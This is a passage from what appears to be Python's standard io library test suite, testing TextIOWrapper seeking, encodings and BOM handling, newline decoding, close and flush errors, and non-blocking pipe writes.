self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
